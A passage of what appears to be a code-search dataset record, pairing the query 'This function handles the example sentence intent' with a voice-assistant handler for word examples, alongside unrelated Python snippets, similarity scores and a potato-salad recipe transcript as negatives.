len(all_equals) > 1 and not all_equals[-2]\\\r\n [0] == all_equals[-1][0]and self.val_pos > 1:\r\n #reset candidates if new item\r\n candidates = []\r\n else:\r\n candidates = self.options[\"val\"]\r\n else:\r\n #use properties as candidates\r\n first = words[0]\r\n candidates = self.options[first]\r\n else:\r\n #use command items as candidates\r\n first = words[0]\r\n candidates = self.options[first]\r\n self.possible_vals = []\r\n if being_completed or equals:\r\n #possible value being_completed\r\n if equals:\r\n if equals[1] and not equals[1] in candidates:\r\n #match value\r\n being_completed = equals[1]\r\n else:\r\n #match property\r\n being_completed = equals[0]\r\n # match options with portion of input being completed\r\n self.current_candidates = [w for w in candidates\\\r\n if w and w.lower().startswith(being_completed.lower())]\r\n\r\n # return possible vals\r\n self.possible_vals = []\r\n if len(self.current_candidates) == 1 and 'set' in words[0] or equals:\r\n # second tab, return vals\r\n if being_completed == self.current_candidates[0]:\r\n #grab possible values\r\n for item in self.options['infovals']:\r\n if being_completed == item:\r\n val = self.options['infovals'][item]\r\n try:\r\n if 'Enumeration' in val['Type']:\r\n self.possible_vals = \\\r\n [v['ValueName'] for v in val['Value']]\r\n except:\r\n if 'boolean' in val['type']:\r\n self.possible_vals = [w for w in ['True', 'False']]\r\n elif 'string' in val['type']:\r\n self.possible_vals = [w for w \\\r\n in val['enum'] if w is not None]\r\n\r\n if self.possible_vals and 'null' \\\r\n in val['type']:\r\n self.possible_vals.append('None')\r\n break\r\n if self.possible_vals:\r\n self.options[\"val\"] = self.possible_vals\r\n self.val_pos = 0\r\n # first tab, complete\r\n else:\r\n self.possible_vals.append(self.current_candidates[0])\r\n self.val_pos += 1\r\n else:\r\n # matching empty string so use all candidates\r\n self.current_candidates = candidates\r\n\r\n except 
(KeyError, IndexError):\r\n self.current_candidates = []\r\n\r\n # Return the state from the match list if found otherwise return None.\r\n try:\r\n if self.possible_vals:\r\n response = self.possible_vals[state]\r\n else:\r\n response = self.current_candidates[state]\r\n except:\r\n # No candidate found for state\r\n response = None\r\n\r\n # Response return\r\n return response", "def add_word(self):\n word = self.word # easier to call word now\n\n wordlist_path = self.get_wordlist_path()\n with open(wordlist_path) as f:\n data = json.load(f)\n\n if exists_already(data,word):\n exit()\n\n next_index = int(data[\"cur_index\"]) + 1 # new index\n data[\"words\"][next_index] = word # update wordlist\n data[\"words\"] = dict(sorted(data[\"words\"].items(), key=lambda item: item[1])) # alphabetisize\n data[\"cur_index\"] = next_index # update index\n\n with open(wordlist_path, 'w') as f:\n json.dump(data, f, indent = 4)\n\n print(f\"[{word}] added to [{self.pos}]. This is the [{next_index}] indexed word added.\")", "async def suggest(self, ctx, choice=None):\n\n if choice is None or choice.lower() in (\"online\", \"voice\"):\n suggestions = get_suggestions(get_users(ctx, choice))\n\n if suggestions:\n await self.bot.say(\"You can play these games: \\n\")\n message = pagify(\"\\n\".join(suggestions), ['\\n'])\n\n for page in message:\n await self.bot.say(box(page))\n else:\n await self.bot.say(\"You have exactly **zero** games in common, go buy a 4-pack!\")\n else:\n await self.bot.say(\"Please enter a valid filter -> either use `online` (default) for all online users or `voice` for all users in a voice channel\")", "def show_message_placed_word(self, word, value, player_name):\n\n interface_width = self.interface.GAME_WINDOW_WIDTH;\n interface_height = self.interface.GAME_WINDOW_HEIGHT;\n\n if(value != 0):\n title_text = \"Le joueur \" + player_name + \" a posé le mot \" + word;\n subtitle_text = \"Il remporte \" + str(value) + \" points !\";\n else:\n title_text = \"Le joueur \" + player_name + \" a posé le mot \" + word;\n subtitle_text = \"Ce mot n'est pas valable, il ne remporte aucun point\";\n\n self.message_placed_word.set_text_title(title_text);\n self.message_placed_word.set_text_subtitle(subtitle_text);\n self.message_placed_word.set_horizontal_alignment(Alignment.Center);\n self.message_placed_word.set_text_title_size(40);\n self.message_placed_word.set_text_subtitle_size(32);\n self.message_placed_word.set_space_between_titles(20);\n self.message_placed_word.set_color_title((0, 0, 0));\n self.message_placed_word.set_color_subtitle((0, 0, 0));\n self.message_placed_word.set_border_color((0, 0, 0));\n self.message_placed_word.set_border_thickness(4);\n\n self.message_placed_word.set_pos((interface_width/2, 200));\n\n self.message_placed_word.show(3);", "def callDatamuse(word, left_context=None):\n global dict_call_counter\n dict_call_counter += 1\n if not left_context:\n lc_text = \"\"\n else:\n lc_text = \"&lc=\" + re.sub(r'[-\"—.–,;:!?()]', '', left_context[:])\n clean_word = re.sub(r'[-\"—.–,;:!?()]', '', word)\n output = requests.get(\"https://api.datamuse.com/words?sp={}{}&md=f\".format(clean_word, lc_text))\n output_list = output.json()\n if len(output_list) != 0:\n matched_words = [i[\"word\"] for i in output_list]\n if clean_word.lower() not in matched_words: # takes into account when datamuse returns a number of words or a different 'related' word\n score = 0\n freq = 0\n else:\n score = output_list[matched_words.index(clean_word.lower())][\"score\"]\n freq = 
float(output_list[matched_words.index(clean_word.lower())][\"tags\"][0][2:])\n else:\n score = 0\n freq = 0\n final_score = score * math.sqrt(freq) # changed from (score + freq) / 2\n return final_score", "async def createCustomAutocompleteRule(self, body=\"\"):\n payload = {}\n \n\n # Parameter validation\n schema = CatalogValidator.createCustomAutocompleteRule()\n schema.dump(schema.load(payload))\n \n # Body validation\n from .models import CreateAutocompleteKeyword\n schema = CreateAutocompleteKeyword()\n schema.dump(schema.load(body))\n \n\n url_with_params = await create_url_with_params(self._conf.domain, f\"/service/platform/catalog/v1.0/company/{self._conf.companyId}/application/{self.applicationId}/search/autocomplete/\", \"\"\"{\"required\":[{\"in\":\"path\",\"name\":\"company_id\",\"description\":\"A `company_id` is a unique identifier for a particular seller account.\",\"schema\":{\"type\":\"string\"},\"required\":true},{\"in\":\"path\",\"name\":\"application_id\",\"description\":\"A `application_id` is a unique identifier for a particular sale channel.\",\"schema\":{\"type\":\"string\"},\"required\":true}],\"optional\":[],\"query\":[],\"headers\":[],\"path\":[{\"in\":\"path\",\"name\":\"company_id\",\"description\":\"A `company_id` is a unique identifier for a particular seller account.\",\"schema\":{\"type\":\"string\"},\"required\":true},{\"in\":\"path\",\"name\":\"application_id\",\"description\":\"A `application_id` is a unique identifier for a particular sale channel.\",\"schema\":{\"type\":\"string\"},\"required\":true}]}\"\"\", )\n query_string = await create_query_string()\n headers = {\n \"Authorization\": \"Bearer \" + await self._conf.getAccessToken()\n }\n for h in self._conf.extraHeaders:\n headers.update(h)\n exclude_headers = []\n for key, val in headers.items():\n if not key.startswith(\"x-fp-\"):\n exclude_headers.append(key)\n return await AiohttpHelper().aiohttp_request(\"POST\", url_with_params, headers=get_headers_with_signature(self._conf.domain, \"post\", await create_url_without_domain(f\"/service/platform/catalog/v1.0/company/{self._conf.companyId}/application/{self.applicationId}/search/autocomplete/\", ), query_string, headers, body, exclude_headers=exclude_headers), data=body)", "def search_keywords(search_term, must_not_term, state, search_type):\n print(\"search_type is \", search_type)\n\n # Search types are freeform and stringmatch\n\n if search_type == \"freeform\":\n print(\"Freeform Search\")\n print(search_term)\n print(\"search_keywords must not\",must_not_term)\n if search_term == \"\" or search_term is None:\n return json.dumps([])\n else:\n # pandas_index_list = elastic_dash.test_search(search_term, must_not_term)\n pandas_index_list = elastic_dash.test_search_standard(search_term, must_not_term)\n # pandas_index_list = elastic_dash.test_search_desc2(search_term, must_not_term)\n # pandas_index_list = elastic_dash.test_search_fivegrams(search_term, must_not_term)\n return json.dumps(pandas_index_list)\n else:\n print(\"Perfect Search\")\n print(search_term)\n print(\"search_keywords must not\", must_not_term)\n if search_term == \"\" or search_term is None:\n return json.dumps([])\n else:\n # pandas_index_list = elastic_dash.test_search(search_term, must_not_term)\n # pandas_index_list = elastic_dash.test_search_standard(search_term, must_not_term)\n pandas_index_list = elastic_dash.test_search_standard_perfect(search_term, must_not_term)\n # pandas_index_list = elastic_dash.test_search_desc2(search_term, must_not_term)\n # 
pandas_index_list = elastic_dash.test_search_fivegrams(search_term, must_not_term)\n return json.dumps(pandas_index_list)", "def get_next_word(self, user_word, computer_word):\n pass", "def test_api_score_word(self):\n\n with self.client as client:\n response = client.get('/api/new-game')\n response_json = response.get_json()\n game_id = response_json[\"gameId\"]\n game = games[game_id]\n game.board[0] = [\"A\", \"A\",\"A\",\"A\",\"A\"]\n game.board[1] = [\"D\", \"O\",\"G\",\"A\",\"A\"]\n game.board[2] = [\"A\", \"A\",\"A\",\"A\",\"A\"]\n game.board[3] = [\"A\", \"A\",\"A\",\"A\",\"A\"]\n game.board[4] = [\"A\", \"A\",\"A\",\"A\",\"A\"]\n\n response = client.post('/api/score-word', json={\"gameId\":game_id, \"word\": \"AAAA\"})\n self.assertEqual(response.get_json(), {\"result\":\"not-word\"})\n response = client.post('/api/score-word', json={\"gameId\":game_id, \"word\": \"dog\"})\n self.assertEqual(response.get_json(), {\"result\": \"ok\"})\n response = client.post('/api/score-word', json={\"gameId\":game_id, \"word\": \"CAT\"})\n self.assertEqual(response.get_json(), {\"result\":\"not-on-board\"})\n\n #inside of the games dictionary, there is a instance of BoggleGame with a board and a game_id\n # we can manualy change the board to include a word and test for test for that word." ]
[ "0.61216205", "0.58270305", "0.58179843", "0.57400197", "0.5649318", "0.5606277", "0.5591704", "0.5455674", "0.5431328", "0.5341701", "0.5329532", "0.52859133", "0.5281709", "0.52787936", "0.52630574", "0.51918024", "0.51817644", "0.5147042", "0.51228225", "0.5112976", "0.51122284", "0.5095223", "0.5091525", "0.5090254", "0.5044046", "0.5017014", "0.50117487", "0.5011184", "0.4999181", "0.49991223", "0.4987326", "0.49838778", "0.49663842", "0.4917687", "0.49067453", "0.49021393", "0.48968187", "0.48946068", "0.48938242", "0.48912147", "0.4886642", "0.48744503", "0.4862664", "0.48553824", "0.48349336", "0.48332134", "0.48286998", "0.48133755", "0.48097754", "0.48063526", "0.48013753", "0.47964182", "0.4790247", "0.47866145", "0.4774536", "0.47606844", "0.47557363", "0.47465742", "0.4741017", "0.47237816", "0.47233644", "0.4721692", "0.4708166", "0.47038886", "0.46940017", "0.46917894", "0.46794337", "0.46711656", "0.46573037", "0.46564916", "0.46467987", "0.4644585", "0.4642203", "0.46385154", "0.46379754", "0.46207488", "0.4619342", "0.46181148", "0.46179625", "0.46167383", "0.46068305", "0.46012977", "0.45959637", "0.45948938", "0.4594324", "0.45936787", "0.45805424", "0.45766434", "0.4575204", "0.45751065", "0.45742786", "0.4572058", "0.4552983", "0.45527774", "0.4551432", "0.45480776", "0.454537", "0.45452186", "0.4537977", "0.45353317" ]
0.6205886
0
This function handles the example sentence intent
def my_word_example_handler(handler_input): # type: (HandlerInput) -> Response slots = handler_input.request_envelope.request.intent.slots if example_slot in slots: curr_word = slots[example_slot].value handler_input.attributes_manager.session_attributes[ example_slot_key] = curr_word try: response = http_get(curr_word, False) if response: example = response[0]['def'][0]['sseq'][0][0][1]['dt'][1][0] if example == "vis": vis = remove_italics(response[0]['def'][0]['sseq'][0][0][1]['dt'][1][1][0]['t']) speech = ("An example with {} (part of speech {}) " "is: {}".format(curr_word, response[0]['fl'], vis)) elif example == "wsgram": vis = remove_italics(response[0]['def'][0]['sseq'][0][0][1]['dt'][2][1][0]['t']) speech = ("An example with {} (part of speech {}) " "is: {}".format(curr_word, response[0]['fl'], vis)) else: speech = ("No example is available for {}").format(curr_word) reprompt = ("What word would you like me to look up?") else: speech = ("No example is available for {}").format(curr_word) reprompt = ("What word would you like me to look up?") except Exception as e: speech = ("No example is available for {}. " "Can I look up another word?").format(curr_word) reprompt = ("What word would you like me to look up?") else: speech = "I'm not sure what word to look up, please try again" reprompt = ("I didn't catch that. What word would you like me " "me to look up?") handler_input.attributes_manager.session_attributes[previous_key] = speech handler_input.response_builder.speak(speech).ask(reprompt) return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_sentence(self):", "def onCurrentSentence(self, *_args):\n global instance\n log(str(_args))\n #if (instance.isSpeaking and len(_args[1])==0): instance.SpeakDone()\n return", "def hook(self, sentence, words):\n pass", "def handle_gui_example_three_intent(self, message):\n self.gui['sampleText'] = \"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Egestas sed tempus urna et pharetra pharetra massa massa ultricies. Aliquam sem et tortor consequat id porta nibh. Amet est placerat in egestas erat imperdiet sed. Ut ornare lectus sit amet est placerat in egestas erat. Iaculis eu non diam phasellus vestibulum lorem sed risus ultricies. Hac habitasse platea dictumst vestibulum rhoncus est pellentesque. Vulputate eu scelerisque felis imperdiet proin fermentum. Neque convallis a cras semper auctor neque. Pharetra magna ac placerat vestibulum lectus mauris ultrices eros in. Phasellus faucibus scelerisque eleifend donec pretium vulputate. Malesuada bibendum arcu vitae elementum curabitur vitae nunc. Tellus id interdum velit laoreet id donec. Diam donec adipiscing tristique risus nec. Nisi lacus sed viverra tellus in hac habitasse platea. Amet venenatis urna cursus eget nunc scelerisque viverra mauris in. Sit amet nisl suscipit adipiscing bibendum est ultricies. Nec ultrices dui sapien eget mi proin sed. Egestas dui id ornare arcu odio ut sem nulla. Rhoncus aenean vel elit scelerisque. Neque gravida in fermentum et sollicitudin. Pellentesque massa placerat duis ultricies lacus sed. Nunc id cursus metus aliquam eleifend mi. Eu feugiat pretium nibh ipsum consequat nisl. Aenean euismod elementum nisi quis eleifend quam adipiscing vitae. Est ante in nibh mauris cursus mattis. Sagittis eu volutpat odio facilisis mauris sit amet. At consectetur lorem donec massa sapien faucibus. Odio facilisis mauris sit amet. Quis ipsum suspendisse ultrices gravida dictum fusce. Sagittis nisl rhoncus mattis rhoncus urna neque viverra justo nec. Eget mi proin sed libero enim sed faucibus. Interdum velit euismod in pellentesque massa. Et netus et malesuada fames. Velit aliquet sagittis id consectetur purus. Condimentum lacinia quis vel eros donec ac odio tempor orci. Amet consectetur adipiscing elit pellentesque habitant. Eleifend mi in nulla posuere sollicitudin aliquam ultrices sagittis orci. Nisi porta lorem mollis aliquam ut porttitor leo a diam. Egestas integer eget aliquet nibh praesent tristique. Velit scelerisque in dictum non. Id volutpat lacus laoreet non curabitur gravida arcu ac. Suspendisse interdum consectetur libero id faucibus nisl tincidunt eget. Ipsum a arcu cursus vitae congue mauris. Duis at consectetur lorem donec massa. Orci sagittis eu volutpat odio facilisis mauris. Eget mauris pharetra et ultrices neque ornare. Commodo nulla facilisi nullam vehicula ipsum a. Arcu risus quis varius quam quisque. Gravida in fermentum et sollicitudin. Lacus laoreet non curabitur gravida arcu ac tortor dignissim. Netus et malesuada fames ac turpis. Ipsum dolor sit amet consectetur adipiscing. Tellus elementum sagittis vitae et leo duis ut diam quam. Vitae et leo duis ut diam quam nulla. Risus pretium quam vulputate dignissim. Justo laoreet sit amet cursus sit amet dictum sit. Blandit libero volutpat sed cras. Lacus sed viverra tellus in. Ornare lectus sit amet est placerat in egestas erat. Tortor dignissim convallis aenean et tortor at. Tempus quam pellentesque nec nam aliquam. Nisi scelerisque eu ultrices vitae auctor eu augue ut lectus. 
Consequat id porta nibh venenatis cras sed felis eget. Massa enim nec dui nunc mattis enim ut. Dignissim enim sit amet venenatis urna. Ac tincidunt vitae semper quis lectus nulla at. Sed felis eget velit aliquet sagittis. Vel turpis nunc eget lorem dolor sed viverra. Non consectetur a erat nam at lectus. Iaculis eu non diam phasellus vestibulum. Dolor sit amet consectetur adipiscing elit ut aliquam purus sit. Libero justo laoreet sit amet cursus sit. Tellus pellentesque eu tincidunt tortor. Maecenas volutpat blandit aliquam etiam erat velit scelerisque in. Semper risus in hendrerit gravida rutrum quisque non tellus orci. Diam in arcu cursus euismod quis viverra nibh cras pulvinar. Habitasse platea dictumst quisque sagittis purus sit amet volutpat consequat. Elit ut aliquam purus sit. Dui faucibus in ornare quam viverra orci sagittis eu. Purus ut faucibus pulvinar elementum integer. Condimentum lacinia quis vel eros donec ac odio tempor. At in tellus integer feugiat scelerisque varius morbi. Augue eget arcu dictum varius duis. Aliquam sem et tortor consequat id. Bibendum arcu vitae elementum curabitur vitae. Massa sed elementum tempus egestas sed sed. Suscipit adipiscing bibendum est ultricies. Etiam tempor orci eu lobortis.\"\n self.gui.show_page(\"paginationExample.qml\")", "def test_make_sentences():\n long_comment = ['I think this movie was really good and will go and see it again. '\n 'This movie really sucked and I hated it']\n new_sentences = make_sentences(long_comment[0])\n print(new_sentences)", "def getSentenceInfo(sentence):\n\tpass", "def test_get_sentence_sentiments():\n long_comment = [\"This was a really sucky movie. I will probably never go see this movie ever again. I am going to \"\n \"tell my whole family never to watch this movie. I very much enjoyed the special cameo in it \"\n \"though. I loved the plot line.\"]\n\n sentence_score_list = get_sentence_sentiments(long_comment[0])\n print(long_comment[0])\n print('per sentence sentiment:', sentence_score_list)\n print()", "def nao_speech(possible_sentences):\n\n print(random.choice(possible_sentences))", "def hey(self, sentence=\"\"):\n if sentence == \"\" or sentence.replace(\" \", \"\") == \"\":\n return \"Fine. Be that way!\"\n if sentence.isupper():\n return \"Woah, chill out!\"\n if sentence[-1] == \"?\":\n return \"Sure.\"\n return \"Whatever.\"", "def main(words, s):\n if words:\n words = int(words)\n click.echo(lorem.words(words))\n\n # Returns a lorem ipsum sentence\n elif s:\n click.echo(lorem.sentence())\n\n # Returns a lorem ipsum paragraph by default\n else:\n click.echo(lorem.paragraph())", "def example_single(args, model, word2idx):\n #在命令行中加载和分段<目标、(推特内容)>配对\n while True:\n target = raw_input(\"问题: \")\n tweet = raw_input(\"回答: \")\n targets = [str(target)]\n tweets = [str(tweet)]\n seged_tweets = yutils.seg_sentence(tweets, choice=\"list\", place=\"hpc\") # may use lexicon here\n seged_targets = yutils.seg_sentence(targets, choice=\"list\", place=\"hpc\")\n predictions = evaluate(args, model, word2idx, seged_tweets, seged_targets)\n print(\"预测结果: \", predictions)", "def test_extend_to_sentence(self):\n before_b = \"\"\"\\\n Americans live in the most severe weather-prone country on Earth. Each year, Americans cope with an average of 10,000 thunderstorms, 2,500 floods, 1,000 tornadoes, as well as an average of 6 deadly hurricanes. Potentially deadly weather impacts every American. 
Communities can now rely on the National Weather Service’s StormReady program to help them guard against the ravages of Mother Nature.\n\n Some 90% of all presidentially declared disasters are weather related, leading to around 500 deaths per year and nearly $14 billion in damage. StormReady, a program started in 1999 in Tulsa, OK, helps arm America's communities with the communication and safety skills needed to save lives and property– before and during the event. StormReady helps community leaders and emergency managers strengthen local safety programs.\n\n StormReady communities are better prepared to save lives from the onslaught of severe weather through better planning, education, and awareness. No community is storm proof, but StormReady can help communities save lives. Does StormReady make a difference?\n \"\"\"\n after_b = \"\"\"\\\n Americans live in the most severe weather-prone country on Earth. Each year, Americans cope with an average of 10,000 thunderstorms, 2,500 floods, 1,000 tornadoes, as well as an average of 6 deadly hurricanes. Potentially deadly weather impacts every American. Communities can now rely on the National Weather Service’s StormReady program to help them guard against the ravages of Mother Nature.\n\n Some 90% of all presidentially declared disasters are weather related, leading to around 500 deaths per year and nearly $14 billion in damage. StormReady, a program started in 1999 in Tulsa, OK, helps arm America's communities with the communication and safety skills needed to save lives and property– before and during the event. StormReady helps community leaders and emergency managers strengthen local safety programs.\n\n StormReady communities are better prepared to save lives from the onslaught of severe weather through better planning, education, and awareness. No community is storm proof, but StormReady can help communities save lives. Does StormReady make a difference?\n \"\"\"\n self.run_test(\n before_b=before_b,\n after_b=after_b,\n before_sel=(\"3.5\", \"3.5\"),\n after_sel=(\"1.395\", \"3.142\"),\n command_name=\"extend-to-sentence\",\n )", "def handle_gui_example_one_intent(self, message):\n self.gui.show_text(\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec placerat varius turpis porta scelerisque. 
Nam feugiat, lectus a ultricies tempus, mi sem tempor felis, vitae laoreet nisi ipsum vitae mauris.\")", "def response(sentence, model, user_id='123', context={}, show_details=False):\n # Load intents\n data_path = os.path.join(\"data/\", \"data_intents.json\")\n with open(data_path) as json_data:\n intents = json.load(json_data)\n\n # Classify sentence\n results = classify(sentence, model)\n # if we have a classification then find the matching intent tag\n if results:\n # loop as long as there are matches to process\n while results:\n for i in intents['intents']:\n # find a tag matching the first result\n if i['tag'] == results[0][0]:\n # set context for this intent if necessary\n if 'context_set' in i:\n if show_details: print('context:', i['context_set'])\n context[user_id] = i['context_set']\n\n # check if this intent is contextual and applies to this user's conversation\n if not 'context_filter' in i or \\\n (user_id in context and 'context_filter' in i and i['context_filter'] == context[user_id]):\n if show_details: print ('tag:', i['tag'])\n # a random response from the intent\n if i[\"tag\"] == \"goodbye\":\n print(random.choice(i['responses']))\n sys.exit()\n else:\n return print(random.choice(i['responses']))\n\n results.pop(0)", "def subject_info(intent, extra_info=[]):\n\n text = intent['inputTranscript'].lower()\n utterances = AS.load_file('sample_utterances.txt')\n\n # add \"book\" and \"books\" to every utterance\n for line in list(utterances):\n utterances.insert(0, line + \" book\")\n utterances.insert(0, line + \" books\")\n\n # tells how many characters needs to be dropped before the subject starts\n to_drop = 0\n\n for line in utterances:\n if text.startswith(line):\n to_drop = len(line)\n break\n\n # drops the characters and makes a list from the strings that are left\n text = text[to_drop:].strip()\n text_list = text.split(' ', len(text))\n\n subject_list = []\n keywords = [\"books\", \"book\", \"by\", \"published\", \"written\"]\n keyword = \"\"\n\n # Find out when the book name ends\n for word in text_list:\n if word not in keywords:\n subject_list.append(word)\n else:\n break\n\n subject = \" \".join(subject_list)\n\n # Get all the keywords in the middle, so they can be\n # all be dropped at once, eg written by, books by\n text_list = text_list[len(subject_list):]\n if text_list:\n word = text_list[0]\n while word in keywords:\n keyword += word + \" \"\n text_list = text_list[1:]\n if text_list:\n word = text_list[0]\n else:\n break\n\n # search for an author from the rest of the characters\n author_text = text[len(keyword):].strip()\n author = AS.search(author_text, False)\n if author is \"\":\n author = None\n\n # There might be old info in the extra_info (author), so \n # we need to clear it\n extra_info.clear()\n\n # add the author to extra info so it can be used in the Finna API call\n if author:\n extra_info += [\"author:\\\"\" + author + \"\\\"\"]\n elif intent['sessionAttributes'].get('author'):\n extra_info += [\n \"author:\\\"\" + intent['sessionAttributes']['author'] + \"\\\"\"\n ]\n\n # The Finna API call\n request = lookfor(term=subject, filter=extra_info)['json']\n\n return parse_subject(request, subject, {'author': author})", "def intent_of_text_LnDOR(ChapterTextS, TargetQuestionsD, TestS, StopWords):\n \n # Chapter Text - stokenize\n StokensCT = stokenize(ChapterTextS, StopWords) \n\n # Test question - stokenize\n StokensTest = stokenize(TestS, StopWords)\n\n # Knowledge Base Dict - stokenize\n KBD_structure = stokenizeKBD(TargetQuestionsD, 
StopWords)\n\n # List (because list is mutable, set is not) of all stokens in document\n StokensDoc = StokensCT[:] # from chapter text\n StokensDoc.extend(StokensTest[:]) # += Test string\n\n # extend list of stokens in Doc\n for i in TargetQuestionsD:\n StokensDoc.extend(TargetQuestionsD[i][\"mq stokens\"][:]) # += KB target [matched Q]s\n StokensDoc.extend(TargetQuestionsD[i][\"ans stokens\"][:]) # += KB answers\n \n StokensTestV = set(StokensTest)\n StokensDocV = set(StokensDoc)\n StokensAntiTgtV = StokensDocV\n \n # Complement of all targets\n for i in TargetQuestionsD:\n StokensAntiTgtV = StokensAntiTgtV.difference(set(TargetQuestionsD[i][\"mq stokens\"]))\n \n # calculate confusion matrix and DOR etc.\n LnDORD = {}\n # Anti Target\n TP, FP, FN, TN = confusion_matrix(StokensDocV, StokensAntiTgtV, StokensTestV) \n LnDOR = lndor(TP, FP, FN, TN) \n someAngle = angleDOR(TP, FP, FN, TN) \n \n LnDORD[\"AntiTgt\"] = {'lndor': LnDOR, 'theta': someAngle}\n\n # total occurences\n total_occ = 0\n for i in TargetQuestionsD:\n total_occ += TargetQuestionsD[i]['count']\n\n for i in TargetQuestionsD:\n StokensTgtV = set(TargetQuestionsD[i][\"mq stokens\"][:])\n\n TP, FP, FN, TN = confusion_matrix(StokensDocV, StokensTgtV, StokensTestV) \n priorOR = TargetQuestionsD[i]['count'] / total_occ\n\n LnDOR = lndor(TP, FP, FN, TN) \n someAngle = angleDOR(TP, FP, FN, TN, priorOR) \n \n LnDORD[i] = {'lndor': LnDOR, 'theta': someAngle}\n # LnDORD = {i: {'lndor': , 'theta': }}, KB indices + \"AntiTgt\"\n\n return LnDORD", "def substantiate():", "def example(self, message, args):\n return \"Example\"", "def test_example():\n example_text = ['''Mark and Jack welcome back to couch on crackerjacks today I'm gonna show you how to make a basic and delicious potato salad some people might call this a country style potato salad some people might refer to it as a deli style of potato salad either way it's got the perfect balance of sweet and tangy from the sugar and the vinegar and pickles and everything else that's in this it's just your basic homemade potato salad you can add any number of things to this to make it your own but I'm just going to show you how I like to make mine so without further ado let's get started so naturally I'm going to start out with my potatoes every potato salad starts with potatoes for this recipe and for my potato salad I prefer using just regular old russet potatoes they're the cheapest they're the best I've tried using Yukon Gold potatoes and red potatoes for this recipe I prefer hands down at the russet potatoes it just it makes the best potato salad for me you can use whatever kind of potatoes you like though and using a potato peeler I'm just going to peel these potatoes a little trick for you that little end on most potato peelers it's kind of rounded use that to dig out the eyes of your potato it's what I've always used it for so it's just the perfect little tool to dig out the eyes of a potato but what you want to do is just go ahead and peel your potatoes and you don't have to peel your potatoes if you don't want to if you like skin on potato salad by all means go ahead and leave the skin on it doesn't make any difference personal preference and as you're peeling your potatoes and you get one done go ahead and put them into a large pot this is going to be the same profit I cut these in that's filled up with water you want to make sure and keep your potatoes covered that will prevent your potatoes from oxidizing and turning that pinky brown color but you just want to go through and 
peel all of your potatoes and I am using three pounds of potatoes for this recipe now once you get all your potatoes peeled you want to go ahead and cut them up basically you want to cut these into about 3/4 inch square pieces so for these medium potatoes I cut them half I turn them 90 degrees cut them into three pea is if you will that way if it's a larger potato do four and then cut those into chunks basically like I said you want about three quarters of an inch by three quarters of an inch by three quarters of an inch pieces and then again throw your potatoes back into the water that you pulled the potatoes out of that way they do not oxidize on you now when you get all your potatoes cut up your water is going to be cloudy and it's gonna be murky and it's gonna be just full of all the starch coming off of those potatoes what you want to do is rinse your potatoes well you want to make sure that the water coming off of that is completely clear go ahead and rinse these a good three or four times and then drain them completely you want to make sure that all of that starch gets off of those potatoes then you want to go ahead and light your stove and take your pot and you want a large pot for this put it over a medium-high heat time actually even high heat or at this point take your drained potatoes and put those into your pot and you want to add enough cold water to this to come up about one inch over the top of the potatoes starting off with cool water your potatoes cook evenly as the water comes up to temperature your potatoes come up with them to temperature if you start out putting cold potatoes into boiling water the outside of the potato is gonna be mush before the inside is actually cooked and before this gets going too far I'm gonna take two large eggs and I'm gonna put those in the water with the potatoes this recipe uses hard-boiled eggs and since I'm boiling the potatoes anyway I might as well just boil the eggs right along with the potatoes so just go ahead and add two large eggs to the pot and you want to cover your pot and you want to bring this up to a boil now once your water is that a boy I'll go ahead and give your potatoes an egg a gentle stir you want to be careful with this because you don't do not want to break your eggs and you also don't want to break up the potatoes but once this comes up to a boil you want to boil this for exactly ten minutes and how to check to make sure that your potatoes are done you want to take a couple large pieces take them out put them on a spoon and using a fork you want to put the fork into the potato and you want just a little bit of give in your potatoes before they break apart if you can see there it's just the slightest little bit of give before the potato breaks up you don't want to cook these any longer than that because they they will finish cooking when you take them off heat but you want to go ahead and drain these in a colander and once they are drained well go ahead and pour your potatoes and eggs back into the pot that you cooked them in and here you can dig out your eggs and you want to put your eggs in a bowl of cold water you want to stop that cooking process as soon as possible because if you cook your eggs too long you're gonna get that dreaded green ring around the yolk go ahead and put those in a bowl of cold water to stop the cooking process immediately and then you want to keep your potatoes in the pot that you cook them in to cool and you want to cool them completely before you do anything else with them if you add a 
salad dressing to hot potatoes it's gonna break on you and you don't want that so just go ahead and let your potatoes steam off and cool and I'm gonna let these sit for about a half an hour before I even start making the dressing for my potato salad and while you're waiting for your potatoes to cool off you can go ahead and peel your eggs it helps to wait a little bit for your eggs to cool down before you peel them just go ahead and crack them on a countertop and then start peeling them if you peel them underneath water or running water they peel super easy so as you can see here's I mean it takes nothing to do it under water water gets under there and the shell just slips off I just go ahead and peel your egg eggs and set them off until later I'm gonna need a few vegetables for my dressing I went ahead and already cut up half of a yellow onion here off a video I thought I was recording when I wasn't you don't need to see me chopped onions anyway everybody knows how to do that I've also got two stalks of celery here I'm just going to cut the ends off as well as the tops if you want to save the tops they make a nice garnish you don't have to keep them and I'm not gonna keep them here the celery I'm going to cut these sticks or stalks into orders and then I'm going to chop those up because I don't like really big chunks of celery in my potato salad so I'm just gonna cut these into four slices and then turn them around and cut these into dices if you will and I'm just going to go ahead after I get that died and set those off to the side until I need them later now for our dressing in a large bowl and you want to make sure that you use a plenty large bowl for this because it does make a lot of potato salad I've got one and a half cups of mayonnaise this recipe really does not work with Miracle Whip so since we're gonna be adding sugar to this stick to the plain old mayonnaise I'm gonna throw my eggs in there and using the back of a fork I'm just gonna break up my eggs if you like big chunks of egg in your potato salad don't mash it up as much but I'm gonna mash this up pretty fine and then you want to add in a quarter of a cup of sugar as well as a teaspoon and a half of salt it seems like a lot of salt it really isn't because there are a lot of potatoes here two teaspoons of white vinegar just plain white distilled vinegar then you want to add two tablespoons of sweet pickle relish you could also use dill pickle relish if you wanted to I like sweet in mine and finally I'm gonna add in two teaspoons of prepared yellow mustard if you like a more mustardy potato salad you can add more mustard if you want to this perfectly acceptable and then using a spoon or a fork whatever just go ahead and mix this up well and then you want to add in your onions and celery and go ahead and get that mixed in and you want to make sure to mix all of your ingredients and get your dressing thoroughly mixed before you add the potatoes because you don't want to over mix this once you get your potatoes added so go ahead and take your cooled potatoes again make sure that they are at least room temperature you do not want them warm or hot at all but go ahead and add those into your bowl and then using a spatula I'm going to gently fold the dressing into my potatoes you want your potatoes to remain as in this large of chunks as possible so don't go crazy you know stirring it stirring stirring you want to gently fold this so your potatoes do stay as whole as possible and a little secret for you just to bind up the 
